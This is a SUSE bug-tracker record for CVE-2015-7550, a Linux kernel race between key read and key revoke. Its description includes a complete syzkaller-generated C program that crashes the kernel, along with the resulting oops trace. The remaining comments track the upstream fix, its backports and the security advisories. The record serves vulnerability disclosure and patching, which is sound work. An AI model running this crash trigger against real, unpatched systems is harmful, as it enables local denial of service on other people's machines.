Bug 958951 – VUL-0: CVE-2015-7550: kernel: User triggerable crash from race between key read and rey revoke

Bug 958951 - (CVE-2015-7550) VUL-0: CVE-2015-7550: kernel: User triggerable crash from race between key read and rey revoke

(CVE-2015-7550)
Summary:	VUL-0: CVE-2015-7550: kernel: User triggerable crash from race between key re...

Status:	RESOLVED FIXED

Classification:	Novell Products
Product:	SUSE Security Incidents
Classification:	Novell Products
Component:	Incidents
Version:	unspecified
Hardware:	Other Other

Priority:	P3 - Medium Severity: Normal
Target Milestone:	---
Assigned To:	Joey Lee
QA Contact:	Security Team bot

URL:	https://smash.suse.de/issue/159733/
Whiteboard:	CVSSv2:RedHat:CVE-2015-7550:4.6:(AV:L...
Keywords:

Depends on:
Blocks:
	Show dependency tree / graph

Create test case

Clone This Bug

Reported:	2015-12-14 10:37 UTC by Marcus Meissner
Modified:	2018-10-25 16:27 UTC (History)
CC List:	6 users (show)

See Also:
Found By:	Security Response Team
Services Priority:
Business Priority:
Blocker:	---
Marketing QA Status:	---
IT Deployment:	---

Flags:	alnovak: needinfo? (jlee)

Attachments
keyctl-race-fix.patch (812 bytes, patch) 2015-12-14 10:37 UTC, Marcus Meissner	Details \| Diff
keyctl-gpf.c (948 bytes, text/plain) 2015-12-14 10:41 UTC, Marcus Meissner	Details
0001-KEYS-Fix-race-between-read-and-revoke.patch (3.40 KB, patch) 2015-12-30 09:54 UTC, Joey Lee	Details \| Diff
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Marcus Meissner 2015-12-14 10:37:02 UTC

via redhat bugzilla


On upstream commit 6764e5ebd5c62236d082f9ae030674467d0b2779 (Dec 9).

The following program causes GPF in keyctl:

// autogenerated by syzkaller (http://github.com/google/syzkaller)
#include <syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>

long r4;

void *thr0(void *arg)
{
	long r5 = syscall(SYS_keyctl, 0x3ul, r4, 0, 0, 0, 0);
	return 0;
}

void *thr1(void *arg)
{
	long r6 = syscall(SYS_keyctl, 0xbul, r4, 0x20000000ul, 0x1000ul, 0, 0);
	return 0;
}

int main()
{
	long r0 = syscall(SYS_mmap, 0x20000000ul, 0x10000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
	memcpy((void*)0x20000e56, "\x75\x73\x65\x72\x00", 5);
	memcpy((void*)0x2000074a, "\x25\x00", 2);
	memcpy((void*)0x20000f77, "\x56\x47\x22\x1d\x9e\xa4\xd3\xf5\x4d\x1b\xd5\xf9\x3f\x92\xd5\xad\x79\xd9\x74\x5a\xda\x21\x45\x09\x3c\xed\x24\x31\x0c\x57\x3f\x4d\xe7\xe0\x3e\x5a\xb2\xb3\xf5\x57\x51\x17\xb7\xa3\x61\xc1\xb7\xc1\xf2\x16\x3a\xb4\x8e\x28\xd0\xcc\x1b\xbb\x4c\x4f\x3e\x90\x6f\x1a\xe2\xe8\x99\x52\x8a\x8a\x10\x6b\x60\xd7\x27\x83\xe0\x70\xc9\x7d\x6d\x25\xa3\xd6\x8c\xf0\x08\xba\xc7\x56\xff\xd6\xd6\x62\xa0\xa5\x54\x5c\xfe\x45\x86\xd3\x39\x6a\xf9\x13\x34\x7a\x0c\xc7\x7e\x87\x44\xb7\x10\x2c\xc5\x75\xe0\x17\x35\xdf\xfe\x98\x6b\xf5\xbc\x0b\xbf\x21\xf8\x6d\x14\x3c\x23\x78\x6e", 137);
	r4 = syscall(SYS_add_key, 0x20000e56ul, 0x2000074aul, 0x20000f77ul, 0x89ul, 0xfffffffffffffffcul, 0);
	pthread_t th[5];
	pthread_create(&th[0], 0, thr0, 0);
	pthread_create(&th[1], 0, thr1, 0);
	pthread_create(&th[2], 0, thr0, 0);
	pthread_create(&th[3], 0, thr1, 0);
	pthread_join(th[0], 0);
	pthread_join(th[1], 0);
	pthread_join(th[2], 0);
	pthread_join(th[3], 0);
	return 0;
}


BUG: unable to handle kernel NULL pointer dereference at 0000000000000010
IP: [<ffffffff816870b7>] user_read+0x37/0xb0 security/keys/user_defined.c:196
PGD 35b9b067 PUD 34c71067 PMD 0
Oops: 0000 [#1] SMP
Modules linked in:
CPU: 1 PID: 7020 Comm: a.out Not tainted 4.4.0-rc4+ #53
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
task: ffff88003243db00 ti: ffff8800364f0000 task.ti: ffff8800364f0000
RIP: 0010:[<ffffffff816870b7>]  [<ffffffff816870b7>] user_read+0x37/0xb0
RSP: 0018:ffff8800364f3ee0  EFLAGS: 00010206
RAX: 0000000000000001 RBX: ffff8800008a8000 RCX: 0000000000000001
RDX: 0000000000000001 RSI: 0000000020000000 RDI: ffff8800008a8000
RBP: ffff8800364f3f00 R08: 0000000000000000 R09: 0000000000000001
R10: ffff88003243db00 R11: ffff88003243e2b8 R12: 0000000000001000
R13: 0000000020000000 R14: 0000000000000000 R15: 0000000000001000
FS:  00007ff559f38700(0000) GS:ffff88003ed00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: 0000000000000010 CR3: 0000000035fe6000 CR4: 00000000000006e0
Stack:
 ffffffffffffffa1 ffff8800008a8020 ffff8800008a8000 0000000020000000
 ffff8800364f3f38 ffffffff81683d7a 00007ff559f38700 0000000000000000
 0000000000000000 00007ff559f389c0 00007ff559f38700 ffff8800364f3f48
Call Trace:
 [<ffffffff81683d7a>] keyctl_read_key+0xba/0xf0 security/keys/keyctl.c:761
 [<     inline     >] SYSC_keyctl security/keys/keyctl.c:1595
 [<ffffffff81684bd4>] SyS_keyctl+0xa4/0x170 security/keys/keyctl.c:1553
 [<ffffffff823fe676>] entry_SYSCALL_64_fastpath+0x16/0x7a arch/x86/entry/entry_64.S:185
Code: 54 49 89 d4 53 48 89 fb e8 27 bc a9 ff 85 c0 74 10 80 3d b0 a7 70 01 00 75 07 48 83 7b 20 00 74 57 4c 8b b3 f0 00 00 00 4d 85 ed <41> 0f b7 5e 10 74 3a 4d 85 e4 74 35 49 39 dc be dc 02 00 00 48
RIP  [<ffffffff816870b7>] user_read+0x37/0xb0 security/keys/user_defined.c:196
 RSP <ffff8800364f3ee0>
CR2: 0000000000000010
---[ end trace acbace9643063ebd ]---


References:
https://bugzilla.redhat.com/show_bug.cgi?id=1291197
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7550
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7550

Comment 1 Marcus Meissner 2015-12-14 10:37:23 UTC

Created attachment 659189 [details]
keyctl-race-fix.patch

keyctl-race-fix.patch  patch from redhat bugzilla

Comment 2 Marcus Meissner 2015-12-14 10:41:31 UTC

Created attachment 659192 [details]
keyctl-gpf.c

gcc -o keyctl-gpf keyctl-gpf.c -lkeyutils -lpthread


... although it does not trigger the race for me.

Comment 3 Marcus Meissner 2015-12-14 10:45:48 UTC

code is also in sle11-sp1 ,assuming all affected.

Comment 4 Marcus Meissner 2015-12-14 10:46:15 UTC

also sle10sp3

Comment 5 Swamp Workflow Management 2015-12-14 23:00:33 UTC

bugbot adjusting priority

Comment 7 Joey Lee 2015-12-21 10:35:18 UTC

Did not see the patch on kernel upstream. I will backport it to SLE first.

Comment 8 Borislav Petkov 2015-12-21 10:44:27 UTC

(In reply to Joey Lee from comment #7)
> Did not see the patch on kernel upstream. I will backport it to SLE first.

Looks like a proposed patch to me. I'd wait with backporting until the maintainer takes it.

Comment 9 Borislav Petkov 2015-12-21 10:46:28 UTC

Here's the upstream submission:

https://lkml.kernel.org/r/20151218013426.4200.99083.stgit@warthog.procyon.org.uk

Comment 10 Joey Lee 2015-12-23 03:45:23 UTC

(In reply to Borislav Petkov from comment #9)
> Here's the upstream submission:
> 
> https://lkml.kernel.org/r/20151218013426.4200.99083.stgit@warthog.procyon.
> org.uk

Thanks, I am waiting upstream merged it.

Joey Lee

Comment 11 Joey Lee 2015-12-30 08:00:54 UTC

(In reply to Joey Lee from comment #10)
> (In reply to Borislav Petkov from comment #9)
> > Here's the upstream submission:
> > 
> > https://lkml.kernel.org/r/20151218013426.4200.99083.stgit@warthog.procyon.
> > org.uk
> 
> Thanks, I am waiting upstream merged it.
> 
> Joey Lee

OK, the patch got merged to mainline:

commit b4a1b4f5047e4f54e194681125c74c0aa64d637d
Author: David Howells <dhowells@redhat.com>
Date:   Fri Dec 18 01:34:26 2015 +0000

    KEYS: Fix race between read and revoke

    This fixes CVE-2015-7550.

I am backporting...

Comment 12 Joey Lee 2015-12-30 09:54:19 UTC

Created attachment 660548 [details]
0001-KEYS-Fix-race-between-read-and-revoke.patch

Backported patch to SLE12.

Comment 13 Joey Lee 2015-12-30 09:55:12 UTC

I pushed backport patch to SLE12 and cve/linux-3.0 in my home branch. Waiting merge.

Comment 14 Joey Lee 2016-01-04 03:25:45 UTC

(In reply to Joey Lee from comment #13)
> I pushed backport patch to SLE12 and cve/linux-3.0 in my home branch.
> Waiting merge.

Patch got merged to cve/linux-3.0:

commit 00e3fc6972ecc33f6e4624fcaa04e59449a01050
Author: Lee, Chun-Yi <jlee@suse.com>
Date:   Wed Dec 30 17:50:37 2015 +0800

    KEYS: Fix race between read and revoke (bnc#958951,
    CVE-2015-7550).


Thanks a lot!

Comment 15 Joey Lee 2016-01-04 05:35:31 UTC

Send patch to openSUSE-42.1 and stable tree, waiting approval.

Comment 16 Joey Lee 2016-01-05 04:50:51 UTC

SLE12:

commit 7c3a0e1d603a170fd26ce6adcd4f8422238aed42
Author: Lee, Chun-Yi <jlee@suse.com>
Date:   Wed Dec 30 17:29:54 2015 +0800

    KEYS: Fix race between read and revoke (bnc#958951,
    CVE-2015-7550).


openSUSE-42.1:

commit 7d873ccfdfaaf2194eb8e83c3d7cbd36e18e3828
Author: Lee, Chun-Yi <jlee@suse.com>
Date:   Mon Jan 4 13:03:53 2016 +0800

    KEYS: Fix race between read and revoke (bnc#958951,
    CVE-2015-7550).


stable:

commit 1c9407bf98c8a225cdb95af536ff77dfb2aed817
Author: Lee, Chun-Yi <jlee@suse.com>
Date:   Mon Jan 4 13:34:03 2016 +0800

    KEYS: Fix race between read and revoke (bnc#958951,
    CVE-2015-7550).

Comment 17 Joey Lee 2016-01-05 04:51:18 UTC

Set this issue to fixed.

Comment 20 Swamp Workflow Management 2016-01-19 13:19:52 UTC

SUSE-SU-2016:0168-1: An update that solves 8 vulnerabilities and has 26 fixes is now available.

Category: security (important)
Bug References: 758040,902606,924919,935087,937261,943959,945649,949440,951155,951199,951392,951615,951638,952579,952976,956708,956801,956876,957395,957546,957988,957990,958463,958504,958510,958647,958886,958951,959190,959364,959399,959436,959705,960300
CVE References: CVE-2015-7550,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575
Sources used:
SUSE Linux Enterprise Workstation Extension 12 (src):    kernel-default-3.12.51-52.34.1
SUSE Linux Enterprise Software Development Kit 12 (src):    kernel-docs-3.12.51-52.34.3, kernel-obs-build-3.12.51-52.34.1
SUSE Linux Enterprise Server 12 (src):    kernel-default-3.12.51-52.34.1, kernel-source-3.12.51-52.34.1, kernel-syms-3.12.51-52.34.1, kernel-xen-3.12.51-52.34.1
SUSE Linux Enterprise Module for Public Cloud 12 (src):    kernel-ec2-3.12.51-52.34.1
SUSE Linux Enterprise Live Patching 12 (src):    kgraft-patch-SLE12_Update_10-1-2.1
SUSE Linux Enterprise Desktop 12 (src):    kernel-default-3.12.51-52.34.1, kernel-source-3.12.51-52.34.1, kernel-syms-3.12.51-52.34.1, kernel-xen-3.12.51-52.34.1

Comment 21 Bruno Friedmann 2016-01-20 08:31:55 UTC

Is there anything in the pipe to fix also kernel for 13.2 and 13.1 versions ?

Comment 22 Marcus Meissner 2016-01-20 09:56:59 UTC

fix is apparently not in 13.2 or 13.1 opensuse branches.

Comment 23 Jeff Mahoney 2016-01-20 16:33:07 UTC

It is now.

MR 355037 for openSUSE 13.2
MR 355038 for openSUSE 13.1

Comment 24 Bernhard Wiedemann 2016-01-20 17:00:30 UTC

This is an autogenerated message for OBS integration:
This bug (958951) was mentioned in
https://build.opensuse.org/request/show/355040 13.1 / kernel-source

Comment 25 Bruno Friedmann 2016-01-21 17:03:31 UTC

Sorry to bother you, but I still didn't see a swamp workflow for Leap 42.1
Is really a sr has been submitted to openSUSE_Leap_42.1_Update ?

Comment 26 Marcus Meissner 2016-01-22 14:30:17 UTC

it is currently in openSUSE:Maintenance:4557 waiting for testing.

Comment 27 Swamp Workflow Management 2016-01-29 13:16:24 UTC

openSUSE-SU-2016:0280-1: An update that solves 10 vulnerabilities and has 18 fixes is now available.

Category: security (important)
Bug References: 865096,865259,913996,950178,950998,952621,954324,954532,954647,955422,956708,957152,957988,957990,958439,958463,958504,958510,958886,958951,959190,959399,960021,960710,961263,961509,962075,962597
CVE References: CVE-2015-7550,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2016-0728
Sources used:
openSUSE Leap 42.1 (src):    kernel-debug-4.1.15-8.1, kernel-default-4.1.15-8.1, kernel-docs-4.1.15-8.3, kernel-ec2-4.1.15-8.1, kernel-obs-build-4.1.15-8.2, kernel-obs-qa-4.1.15-8.1, kernel-obs-qa-xen-4.1.15-8.1, kernel-pae-4.1.15-8.1, kernel-pv-4.1.15-8.1, kernel-source-4.1.15-8.1, kernel-syms-4.1.15-8.1, kernel-vanilla-4.1.15-8.1, kernel-xen-4.1.15-8.1

Comment 28 Swamp Workflow Management 2016-02-01 15:28:27 UTC

openSUSE-SU-2016:0301-1: An update that solves 57 vulnerabilities and has 21 fixes is now available.

Category: security (important)
Bug References: 814440,851610,869564,873385,906545,907818,909077,909477,911326,912202,915517,915577,917830,918333,919007,919018,919463,919596,921313,921949,922583,922936,922944,926238,926240,927780,927786,928130,929525,930399,931988,932348,933896,933904,933907,933934,935542,935705,936502,936831,937032,937033,937969,938706,940338,944296,945825,947155,949936,950998,951194,951440,951627,952384,952579,952976,953052,953527,954138,954404,955224,955354,955422,956708,956934,957988,957990,958504,958510,958886,958951,959190,959399,959568,960839,961509,961739,962075
CVE References: CVE-2014-2568,CVE-2014-8133,CVE-2014-8989,CVE-2014-9090,CVE-2014-9419,CVE-2014-9529,CVE-2014-9683,CVE-2014-9715,CVE-2014-9728,CVE-2014-9729,CVE-2014-9730,CVE-2014-9731,CVE-2015-0272,CVE-2015-0777,CVE-2015-1420,CVE-2015-1421,CVE-2015-2041,CVE-2015-2042,CVE-2015-2150,CVE-2015-2666,CVE-2015-2830,CVE-2015-2922,CVE-2015-2925,CVE-2015-3212,CVE-2015-3339,CVE-2015-3636,CVE-2015-4001,CVE-2015-4002,CVE-2015-4003,CVE-2015-4004,CVE-2015-4036,CVE-2015-4167,CVE-2015-4692,CVE-2015-4700,CVE-2015-5157,CVE-2015-5283,CVE-2015-5307,CVE-2015-5364,CVE-2015-5366,CVE-2015-5707,CVE-2015-6937,CVE-2015-7550,CVE-2015-7799,CVE-2015-7833,CVE-2015-7872,CVE-2015-7885,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2016-0728
Sources used:
openSUSE 13.1 (src):    cloop-2.639-11.22.2, crash-7.0.2-2.22.2, hdjmod-1.28-16.22.2, ipset-6.21.1-2.26.2, iscsitarget-1.4.20.3-13.22.2, kernel-debug-3.11.10-32.1, kernel-default-3.11.10-32.1, kernel-desktop-3.11.10-32.1, kernel-docs-3.11.10-32.3, kernel-ec2-3.11.10-32.1, kernel-pae-3.11.10-32.1, kernel-source-3.11.10-32.1, kernel-syms-3.11.10-32.1, kernel-trace-3.11.10-32.1, kernel-vanilla-3.11.10-32.1, kernel-xen-3.11.10-32.1, ndiswrapper-1.58-22.1, pcfclock-0.44-258.22.1, vhba-kmp-20130607-2.23.1, virtualbox-4.2.36-2.55.1, xen-4.3.4_10-56.1, xtables-addons-2.3-2.22.1

Comment 29 Swamp Workflow Management 2016-02-03 14:18:42 UTC

openSUSE-SU-2016:0318-1: An update that solves 19 vulnerabilities and has 18 fixes is now available.

Category: security (important)
Bug References: 814440,906545,912202,921949,937969,937970,938706,944296,945825,949936,950998,951627,951638,952384,952579,952976,953527,954138,954404,955224,955354,955422,956708,956934,957988,957990,958504,958510,958886,958951,959190,959399,959568,960839,961509,961739,962075
CVE References: CVE-2014-8989,CVE-2014-9529,CVE-2015-5157,CVE-2015-5307,CVE-2015-6937,CVE-2015-7550,CVE-2015-7799,CVE-2015-7885,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2016-0728
Sources used:
openSUSE 13.2 (src):    bbswitch-0.8-3.15.1, cloop-2.639-14.15.1, crash-7.0.8-15.1, hdjmod-1.28-18.16.1, ipset-6.23-15.1, kernel-debug-3.16.7-32.1, kernel-default-3.16.7-32.1, kernel-desktop-3.16.7-32.1, kernel-docs-3.16.7-32.2, kernel-ec2-3.16.7-32.1, kernel-obs-build-3.16.7-32.2, kernel-obs-qa-3.16.7-32.1, kernel-obs-qa-xen-3.16.7-32.1, kernel-pae-3.16.7-32.1, kernel-source-3.16.7-32.1, kernel-syms-3.16.7-32.1, kernel-vanilla-3.16.7-32.1, kernel-xen-3.16.7-32.1, pcfclock-0.44-260.15.1, vhba-kmp-20140629-2.15.1, virtualbox-4.3.34-37.1, xen-4.4.3_08-38.1, xtables-addons-2.6-15.1

Comment 30 Swamp Workflow Management 2016-02-25 20:19:55 UTC

SUSE-SU-2016:0585-1: An update that solves 17 vulnerabilities and has 54 fixes is now available.

Category: security (important)
Bug References: 812259,855062,867583,899908,902606,924919,935087,937261,937444,938577,940338,940946,941363,942476,943989,944749,945649,947953,949440,949936,950292,951199,951392,951615,952579,952976,954992,955118,955354,955654,956514,956708,957525,957988,957990,958463,958886,958951,959090,959146,959190,959257,959364,959399,959436,959463,959629,960221,960227,960281,960300,961202,961257,961500,961509,961516,961588,961971,962336,962356,962788,962965,963449,963572,963765,963767,963825,964230,964821,965344,965840
CVE References: CVE-2013-7446,CVE-2015-0272,CVE-2015-5707,CVE-2015-7550,CVE-2015-7799,CVE-2015-8215,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8569,CVE-2015-8575,CVE-2015-8660,CVE-2015-8767,CVE-2015-8785,CVE-2016-0723,CVE-2016-2069
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP1 (src):    kernel-default-3.12.53-60.30.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    kernel-docs-3.12.53-60.30.2, kernel-obs-build-3.12.53-60.30.2
SUSE Linux Enterprise Server 12-SP1 (src):    kernel-default-3.12.53-60.30.1, kernel-source-3.12.53-60.30.1, kernel-syms-3.12.53-60.30.1, kernel-xen-3.12.53-60.30.1, lttng-modules-2.7.0-3.1
SUSE Linux Enterprise Module for Public Cloud 12 (src):    kernel-ec2-3.12.53-60.30.1
SUSE Linux Enterprise Live Patching 12 (src):    kgraft-patch-SLE12-SP1_Update_3-1-2.1
SUSE Linux Enterprise Desktop 12-SP1 (src):    kernel-default-3.12.53-60.30.1, kernel-source-3.12.53-60.30.1, kernel-syms-3.12.53-60.30.1, kernel-xen-3.12.53-60.30.1

Comment 31 Swamp Workflow Management 2016-04-01 09:32:03 UTC

SUSE-SU-2016:0911-1: An update that solves 23 vulnerabilities and has 42 fixes is now available.

Category: security (important)
Bug References: 758040,904035,912738,915183,924919,933782,937444,940017,940946,942082,947128,948330,949298,951392,951815,952976,953369,954992,955308,955654,955837,955925,956084,956375,956514,956708,956949,957986,957988,957990,958000,958463,958886,958906,958912,958951,959190,959312,959399,959649,959705,961500,961509,961516,961658,962965,963276,963561,963765,963767,964201,964818,966094,966137,966437,966693,967042,967972,967973,967974,967975,968011,968012,968013,969307
CVE References: CVE-2013-7446,CVE-2015-7515,CVE-2015-7550,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2016-0723,CVE-2016-2069,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549
Sources used:
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    kernel-docs-3.0.101-71.2
SUSE Linux Enterprise Server 11-SP4 (src):    kernel-default-3.0.101-71.1, kernel-ec2-3.0.101-71.1, kernel-pae-3.0.101-71.1, kernel-ppc64-3.0.101-71.1, kernel-source-3.0.101-71.1, kernel-syms-3.0.101-71.1, kernel-trace-3.0.101-71.1, kernel-xen-3.0.101-71.1
SUSE Linux Enterprise Server 11-EXTRA (src):    kernel-default-3.0.101-71.1, kernel-pae-3.0.101-71.1, kernel-ppc64-3.0.101-71.1, kernel-trace-3.0.101-71.1, kernel-xen-3.0.101-71.1
SUSE Linux Enterprise Desktop 11-SP4 (src):    kernel-default-3.0.101-71.1, kernel-pae-3.0.101-71.1, kernel-source-3.0.101-71.1, kernel-syms-3.0.101-71.1, kernel-trace-3.0.101-71.1, kernel-xen-3.0.101-71.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    kernel-default-3.0.101-71.1, kernel-ec2-3.0.101-71.1, kernel-pae-3.0.101-71.1, kernel-ppc64-3.0.101-71.1, kernel-trace-3.0.101-71.1, kernel-xen-3.0.101-71.1

Product List: SUSE Linux Enterprise Software Development Kit 11-SP4
SUSE Linux Enterprise Server 11-SP4
SUSE Linux Enterprise Server 11-EXTRA
SUSE Linux Enterprise Desktop 11-SP4
SUSE Linux Enterprise Debuginfo 11-SP4

Comment 32 Swamp Workflow Management 2016-04-19 17:15:14 UTC

SUSE-SU-2016:1102-1: An update that solves 23 vulnerabilities and has 43 fixes is now available.

Category: security (important)
Bug References: 758040,904035,912738,915183,924919,933782,937444,940017,940946,942082,947128,948330,949298,951392,951815,952976,953369,954992,955308,955654,955837,955925,956084,956375,956514,956708,956949,957986,957988,957990,958000,958463,958886,958906,958912,958951,959190,959312,959399,959649,959705,961500,961509,961516,961658,962965,963276,963561,963765,963767,964201,964818,966094,966137,966437,966693,967042,967972,967973,967974,967975,968011,968012,968013,969307,969571
CVE References: CVE-2013-7446,CVE-2015-7515,CVE-2015-7550,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2016-0723,CVE-2016-2069,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549
Sources used:
SUSE Linux Enterprise Real Time Extension 11-SP4 (src):    kernel-rt-3.0.101.rt130-51.1, kernel-rt_trace-3.0.101.rt130-51.1, kernel-source-rt-3.0.101.rt130-51.1, kernel-syms-rt-3.0.101.rt130-51.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    kernel-rt-3.0.101.rt130-51.1, kernel-rt_debug-3.0.101.rt130-51.1, kernel-rt_trace-3.0.101.rt130-51.1

Comment 33 Swamp Workflow Management 2016-05-03 17:16:42 UTC

SUSE-SU-2016:1203-1: An update that solves 41 vulnerabilities and has 49 fixes is now available.

Category: security (important)
Bug References: 758040,781018,879378,879381,904035,924919,934787,935123,937444,939955,940017,940413,940913,940946,941514,942082,946122,947128,948330,949298,949752,949936,950750,950998,951392,952976,954628,955308,955354,955654,955673,956375,956514,956707,956708,956709,956852,956949,957988,957990,958463,958886,958906,958912,958951,959190,959312,959399,959705,960857,961500,961509,961512,961516,961518,963276,963765,963767,963998,964201,965319,965923,966437,966693,967863,967972,967973,967974,967975,968010,968011,968012,968013,968141,968670,969307,970504,970892,970909,970911,970948,970956,970958,970970,971124,971125,971360,973570,974646,975945
CVE References: CVE-2013-7446,CVE-2015-7509,CVE-2015-7515,CVE-2015-7550,CVE-2015-7566,CVE-2015-7799,CVE-2015-8215,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2015-8816,CVE-2016-0723,CVE-2016-2069,CVE-2016-2143,CVE-2016-2184,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549,CVE-2016-2782,CVE-2016-2847,CVE-2016-3137,CVE-2016-3138,CVE-2016-3139,CVE-2016-3140,CVE-2016-3156,CVE-2016-3955
Sources used:
SUSE OpenStack Cloud 5 (src):    kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1
SUSE Manager Proxy 2.1 (src):    kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1
SUSE Manager 2.1 (src):    kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1
SUSE Linux Enterprise Server 11-SP3-LTSS (src):    kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-pae-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1
SUSE Linux Enterprise Server 11-EXTRA (src):    kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-pae-3.0.101-0.47.79.1, kernel-ppc64-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1
SUSE Linux Enterprise Debuginfo 11-SP3 (src):    kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-pae-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1

Comment 34 Marcus Meissner 2016-08-01 12:51:40 UTC

released

Comment 35 Swamp Workflow Management 2016-08-15 14:13:55 UTC

SUSE-SU-2016:2074-1: An update that solves 48 vulnerabilities and has 13 fixes is now available.

Category: security (important)
Bug References: 816446,861093,928130,935757,939826,942367,945825,946117,946309,948562,949744,949936,951440,952384,953527,954404,955354,955654,956708,956709,958463,958886,958951,959190,959399,961500,961509,961512,963765,963767,964201,966437,966460,966662,966693,967972,967973,967974,967975,968010,968011,968012,968013,968670,970504,970892,970909,970911,970948,970956,970958,970970,971124,971125,971126,971360,972510,973570,975945,977847,978822
CVE References: CVE-2013-2015,CVE-2013-7446,CVE-2015-0272,CVE-2015-3339,CVE-2015-5307,CVE-2015-6252,CVE-2015-6937,CVE-2015-7509,CVE-2015-7515,CVE-2015-7550,CVE-2015-7566,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8539,CVE-2015-8543,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2015-8816,CVE-2016-0723,CVE-2016-2069,CVE-2016-2143,CVE-2016-2184,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549,CVE-2016-2782,CVE-2016-2847,CVE-2016-3134,CVE-2016-3137,CVE-2016-3138,CVE-2016-3139,CVE-2016-3140,CVE-2016-3156,CVE-2016-4486
Sources used:
SUSE Linux Enterprise Server 11-SP2-LTSS (src):    kernel-default-3.0.101-0.7.40.1, kernel-ec2-3.0.101-0.7.40.1, kernel-pae-3.0.101-0.7.40.1, kernel-source-3.0.101-0.7.40.1, kernel-syms-3.0.101-0.7.40.1, kernel-trace-3.0.101-0.7.40.1, kernel-xen-3.0.101-0.7.40.1
SUSE Linux Enterprise Debuginfo 11-SP2 (src):    kernel-default-3.0.101-0.7.40.1, kernel-ec2-3.0.101-0.7.40.1, kernel-pae-3.0.101-0.7.40.1, kernel-trace-3.0.101-0.7.40.1, kernel-xen-3.0.101-0.7.40.1

Comment 36 Swamp Workflow Management 2016-10-26 16:15:00 UTC

openSUSE-SU-2016:2649-1: An update that solves 49 vulnerabilities and has 17 fixes is now available.

Category: security (important)
